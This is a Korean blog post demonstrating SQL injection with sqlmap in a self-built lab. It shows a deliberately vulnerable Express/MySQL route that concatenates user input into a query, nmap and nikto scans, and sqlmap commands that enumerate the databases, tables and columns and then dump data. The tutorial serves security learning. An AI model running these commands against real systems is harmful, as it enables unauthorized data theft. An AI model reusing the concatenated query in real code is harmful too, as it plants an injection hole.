기본 콘텐츠로 건너뛰기

[kali linux] sql injection의 대표적인 툴인 sqlmap

위 내용은 자체 제작한 서버에서 테스트 함을 명시합니다. 
절때 타 사이트에서 테스트를 금지합니다.


sqlmap은 sql injection공격을 자동적으로 공격을 해주는 툴이다.

공격자
os : kali linux 1.0
IP : 192.168.1.165


피해자
OS : window 7 64bit
웹 서버 : x
프레임워크 : express
서버 : node.js
DB 종류 : mysql 5.7.5
server ip : 192.168.1.169
db ip : 192.168.1.169:3000 (server localhost)


1. 서버실행

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
var express = require('express');
var mysql = require('mysql');
var app = express();
var client = mysql.createConnection({
    host:'127.0.0.1',
    port:'3306',
    user: 'root',
    password: '******',
    database: 'test'
});
app.get('/'function(req, res){
  res.send('hello world');
});
app.get('/test'function(req, res){
    var id = req.param('id');
    console.log(id);
    sql = "SELECT *FROM test WHERE id = "+ id 
    client.query(sql ,  function(err, data){
    
        if(err){
            console.log(err)
             res.end('err');
             
         }
        else{
            console.log(data);
            res.end('success');
        }   
    });
});
app.listen(3000,function(){
    console.log('server on');
});
cs

express를 사용하여 서버를 만들것 이다.

3000번 포트로 실행을 해주자.















공격자측에서 nmap을 이용하여 서버측 포트를 확인을 해보았다.

443, 3306포트가 오픈되어있다. 각각 https, mysql의 대표적인 포트번호이다.
피해자 pc에서 3000번 포트로 서버가 열려있음을 확인을 할 수 있다.
















서버측에서
test라는 DB를 생성을 하였다.

이제 
이제 sqlmap을 이용하여 서버로 sql injection을 시도를할 것이다.

sqlmap -u 192.168.1.169:3000/test?id=12 -p "id" --dbs

-u : url
-p : parameter

--dbs : db목록을 얻겠다.



















DB를 획득 성공하였다.

이제 해당 DB의 테이블을 얻어오겠다.

sqlmap -u 192.168.1.169:3000/test?id=12 -D test --tables

-D : --dbs로 얻은 database name
--tables : table name을 찾겠다




















test라는 table을 발견을 했다.

이제 어떤 컬럼이 있는지 해보자.

sqlmap -u 192.168.1.169:3000/test?id=12 -D test -T test --columns

-T : --tables로 찾은 table name
--columns : 해당 디비, 테이블에서 컬럼을 찾겠다.


























컬럼 획득을 완료하였다.

중간점검을 좀 해보자. 

현재 획득한 database, table, column이 각각 
database : test,
table : test
columns : id, test1, test2, test3, test4였다.
























이제 해당 테이블에서 특정 컬럼에 어떤 data가 들어있는지 확인을 해보겠다.

sqlmap -u 192.168.1.169:3000/test?id=12 -D test -T test -C id --dump













id컬럼에 대해서 조회를 하니 1이라는 데이터가 하나 들어있다.


데이터를 method를 이용한 방법이 아닌 path에 데이터를 실어서 보낸다면 이런 툴들에 대한 대비는 어느정도 할 수 있을것 같긴하다. 단, 기존의 툴들에 의해서만 가능할 듯 쿼리를 parameter에서 path쪽으로 옮기기만 하면 그만이니 큰 대응책은 아닐듯 하다.


추가적으로 웹 서버의 서버 스택을 확인하기 위해 nikto를 이용하여 서버쪽의 웹서버, 숨겨져 있는 라우터를 찾아낼 수 있다.
























/admin : This might be interesting... 

/admin을 발견을 하였다.
















/test/를 발견을 하였다.

nginx가 생각난 김에 exploit db에서 nginx가 있나 검색해봤는데 운영체제별로 3~4개정도가 발견된듯 하다. (귀찮아서 테스트는 하지 않으련다...)

https://www.exploit-db.com/search/?action=search&description=nginx&g-recaptcha-response=03AHJ_VutLgDq-5sdikoX_S-FvG-RbZBwc7aWEn9pQYXm1BCOquDM3uk50eDnXu_zIlNwGsp38ariLO3Zpzf4WFRhuF9OegID2dBVAqbOeOV9UoRV9bLJlzbd6Icr2HO51BuolXp1xpVai3evWFNFeVKaClbxWOIamZaraX4HqP17AR9rZpqeHGWxUUHzlrEfUoSo_rRb-7P-YSFAyLsCjnsdtGSJmM2L3uifKcKd4WfTaJS_JOI73j84T1pBKS2xctD9qRuONzgXPPPv-S0_KBmaHQnmST7YG8hYzvKbNvdVckI9LETx6eQQkbdsdUr4llcHDErddV1zDRK7akQcXP4ck6alNJ3U4HGiPZECcWXFOO_598CArNOqB5ZYn4VXjNjmwhzWHfqLdwV3acJI3hFFtIDbOHxz88l84mIuakJ_CZP_FTpSmuuLtVHpMuMzMx5CNZyWc5vIxo7XQUOemlSm6j1XFqEM2qQbTZKbiP5BYG4KWA7nYuS8hmXyjSTCRILd1jWe3iqhSJxDfRbXIlgGtkPtqHf4T_vdflHq2iLsgvVE6jGo1EutokujIvqwNNHl4rCGC5ZsKHW3OsjJTEuMpRD0wETksAFtoPtd0subvpMCDDA_BmIAWrxSxEEDZBTnokhXBrmiysbxnH3zfpSA2Hih0VEEEuIsyfkaV-8DfyOZ5-r6ORcxfU5GTrdaAp89sGS_QMzdXndmYf3lEvWERWmpScXm9WSwA2tOhl8DPkSpmXzLsxrYEOyopdI9JHitPkpF3h8nCBD51tQyyqR4xpNxxd7T6YGum3YPVzvcClWVvCVeZTGmdxPuMJxgWnqeK-bm8eKufQT8g2FfSKrN2UaD4gxsNia7uSZBL4o4uMsu6WlqA8CQHg0MRKUOmhL5hYaSCjrfgGXp1YvXbQI6jCTowmfEpAA&dos=remove&msf=remove

댓글

이 블로그의 인기 게시물

[kali linux] sqlmap - post요청 injection 시도

아래 내용은 직접 테스트 서버를 구축하여 테스트 함을 알립니다.  실 서버에 사용하여 얻는 불이익에는 책임을 지지 않음을 알립니다. sqlmap을 이용하여 get요청이 아닌 post요청에 대해서 injection공격을 시도하자. 뚀한 다양한 플래그를 이용하여 DB 취약점 테스트를 진행을 해보려고 한다. 서버  OS : windows 7 64bit Web server : X Server engine : node.js Framework : expresss Use modules : mysql Address : 172.30.1.30 Open port : 6000번 공격자 OS : kali linux 64bit use tools : sqlmap Address : 172.30.1.57 우선 서버측 부터  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 var  express  =  require( 'express' ); var  app  =  express(); var  mysql  =  require( 'mysql' ); var  ccc  =  mysql.createConnection({     host: '127.0.0.1' ,     user: 'root' ,     pos...

[git] git log 확인하기

git log를 통해서 커밋 이력과 해당 커밋에서 어떤 작업이 있었는지에 대해 조회를 할 수 있다. 우선 git에서의 주요 명령어부터 알아보겠다. $ git push [branch name] $ git pull [branch name] 여기서 branch name은 로컬일 경우 해당 브런치 이름만 적으면 되지만 깃허브 원격 저장소로 연결을 원할 경우는 해당 브런치 이름 앞에 꼭 origin을 붙이도록 한다. $ git brnch [branch name] $ git checkout [branch name] branch일경우 해당 브런치를 생성을 한다. 여기서 현재의 브런치를 기준으로 브런치를 따는것이다. checkout은 브런치를 바꾸는 것이다.(HEAD~[숫자]를 이용하면 해당 커밋으로 움직일수 있다.. 아니면 해당 커밋 번호를 통해 직접 옮기는것도 가능하다.) -> 해당 커밋으로 옮기는 것일뿐 실질적으로 바뀌는 것은 없다. 해당 커밋으로 완전히 되돌리려면 reset이라는 명령어를 써야한다. 처음 checkout을 쓰면 매우 신기하게 느껴진다. 막 폴더가 생겼다가 지워졌다가 ㅋㅋㅋㅋㅋ  master 브런치에서는 ht.html파일이 존재하지만 a브런치에서는 존재하지않는다. checkout 으로 변경을 하면 D 로 명시를 해준다.  $ git log 해당 브런치의 커밋 내역을 보여준다. a 브런치의 커밋 내역들이다. (머지 테스트를 하느라 커밋 내용이 거의 비슷하다 ㅋㅋ) master 브런치의 커밋 내역들이다. 커밋 번호, 사용자, 날짜, 내용순으로 등장을 한다. 이건 단순히 지금까지의 내역을 훑어보기 좋다. 좀더 세밀한 내용을 봐보자. $ git log --stat --stat을 붙이면 기존의 로그에서 간략하게...

[git] pull을 하여 최신코드를 내려받자

보면 먼가 로고가 다르게 뜨는것을 확인을 할 수가있다. C:\Users\mung\Desktop\etc\study\python-gene>git checkout remotes/origin/master Note: checking out 'remotes/origin/master'. You are in 'detached HEAD' state. You can look around, make experimental changes and commit them, and you can discard any commits you make in this state without impacting any branches by performing another checkout. If you want to create a new branch to retain commits you create, you may do so (now or later) by using -b with the checkout command again. Example:   git checkout -b HEAD is now at 29e282a... fetch test C:\Users\mung\Desktop\etc\study\python-gene>git branch * (HEAD detached at origin/master)   master   test1   test2 깃이 잘 쓰면 참 좋은놈인데 어지간히 쓰기가 까다롭다. 처음에 깃을 푸시 성공하는데만 한달정도 걸렸던걸로 기억이 난다.. ㅋㅋㅋ 여담으로  깃 프로필을 가면 아래사진 처럼 보인다. 기여도에 따라서 초록색으로 작은 박스가 채워지는데 저걸 잔디라고 표현을 한다고 합니다 ㅎ 저 사진은 제 깃 기여도 사진입니당 ㅋㅋㅋㅋ 다시 본론으로 돌아와서 ㅋㅋ pull을 하면...